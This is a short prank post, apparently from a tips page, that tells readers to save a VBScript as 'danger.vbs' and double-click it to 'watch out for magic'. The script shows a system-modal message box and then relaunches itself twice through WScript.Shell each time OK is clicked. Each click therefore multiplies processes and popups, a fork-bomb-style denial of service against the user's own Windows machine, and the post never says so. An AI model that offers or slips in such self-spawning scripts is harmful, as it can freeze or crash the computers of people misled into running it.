Copy the below code into a notepad and save it as ".vbs" file with name "danger". Double click on the file and watch out for magic!!!
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
MyVar = MsgBox ("Hello World!", 4096 , "MsgBox Example")
set WshShell = CreateObject("wscript.shell")
If MyVar = 1 Then
iTemp = MyVar + 1
WshShell.Run "Danger.vbs"
For iCount = 1 to iTemp
iAbc = MsgBox ("Hello World!", 4096 , "MsgBox Example")
Next
End If
set WshShell = CreateObject("wscript.shell")
If MyVar = 1 Then
iTemp = MyVar + 1
WshShell.Run "Danger.vbs"
For iCount = 1 to iTemp
iAbc = MsgBox ("Hello World!", 4096 , "MsgBox Example")
Next
End If
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
